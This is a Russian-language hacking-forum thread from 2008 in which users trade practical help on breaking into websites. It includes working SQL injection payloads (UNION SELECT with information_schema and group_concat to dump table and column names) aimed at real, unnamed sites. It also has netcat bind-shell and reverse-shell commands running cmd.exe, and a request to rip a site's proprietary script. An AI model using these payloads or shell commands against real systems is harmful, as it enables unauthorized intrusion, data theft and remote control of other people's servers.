Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. WaterSpirit

    WaterSpirit New Member

    Joined:
    21 Dec 2008
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Спасибо, что ответили, а также за просвеление примерно понял, что такое XSS. Что касаемо вопроса, то уже достаточно давно ищю скрипт что-то между кинопоиска и стандартного видеокаталога. А этот сайт как раз то что нужно. Такого скрипта наврядли где найдешь. Вот и мучает вопрос как с сие чудо мысли сделать рип. На другом форуме рипы делают но скрывают за такими сообщениями, которые я буду набирать года два не меньше это если с флудом, что не очень правильно. Поэтому пришел к мысли либо кого-то попросить рипануть либо как-нить самому это сделать, потому как аналогов я еще пока не видел.
    Заранее прошу прощения за данное сообщение, так как оно может расцениватся как флуд.
     
    4 people like this.
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    подставляю ковычку
    он мне выдает

    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'cint'

    /instructorDesc.asp, line 45

    возможна ли скуль?
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    У MJDE должна быть немного другая ошибка. Полагаю, что тут инъекции нету.
     
  4. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    nc -l -p ПОРТ -d -e cmd.exe -BIND
    nc host порт -d -e cmd.exe -Back-Connect
     
    #4204 The_HuliGun, 22 Dec 2008
    Last edited: 22 Dec 2008
  5. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Спасиб ;)
     
  6. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Товарищи выручите плз еще раз :)
    Такая ситуация, нашел иньекцию на сайте(версия мускула > 5 ), Нашел колонку которая интересна, теперь при запросе:
    xxx.com/index.php?id=-1+union+select+1,2,3+from+user/*
    Мне выдает:
    Table 'sitename.user' doesn't exist

    В чем ошибка? O_O

    P.S. ссылку не дам :)
     
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    таблицы user нету в той базе, в которой работает сайт.
     
  8. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    нет такой таблицы.
    сначала попробуй вытащить названия всех таблиц через information_schema
     
  9. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Через информатион.схема и вытащил!!!
    Потом прочитал все columns и вот сейчас выдает это!!
    Если кому-то не лень, стукните в аську 24-три9-24 плиз :)
     
  10. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Oracle

    Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.
     
  11. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Хочу вывести название колонок, но при
    Выводит
    Пробовал
    Выводит почти тоже самое
    Может я чего не так делаю или как нибудь по другому нужно. Хелп, плиз.
    Версия 5.0.45-log
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    попробуй concat_all

    2 hackmen:

    скобки убери, когда хексишь, и "--" пишется в конце всех запросов и условий
     
  13. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    вместо -- пиши /*
    это тебе не мсскл

    ну и кавычки ещё по-хорошему писать надо
     
  14. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    hackmen, чтоза IINFORMATION_SCHEMA ?
     
    2 people like this.
  15. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Вот черт =)
    Спасиб!
     
  16. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://forum.antichat.ru/showpost.php?p=449408&postcount=5
     
  17. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
     
  18. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    MSSQL:
    Можно ли одним запросом вывести все таблицы c соответствуюющими им колонками? (в файл через makewebtask)
     
  19. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    В моей практике я такого не замечал. возможно вывести все таблицы которые есть в строчку, то есть если тебе выдает по одному столбцу или колонке не обязательно юзать limit а возможно посмотреть вомандой group_concat Пр: =-1+union+select+1,group_concat(unhex(hex(table_name))),3+from+information_schema.tables--
    выведутся все таблицы в строчку через запятульку. так же и с колонками в таблице. Способ упрощает твою задачу во много раз. Удачи
     
  20. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Ghost0ff
    это в mysql,а человек спрашивает за mssql.
    Тем более, что group_concat() выводит только первую 1000 знаков (или как то так), если не ошибаюсь. Но все таблицы ты не выведешь.
     
Thread Status:
Not open for further replies.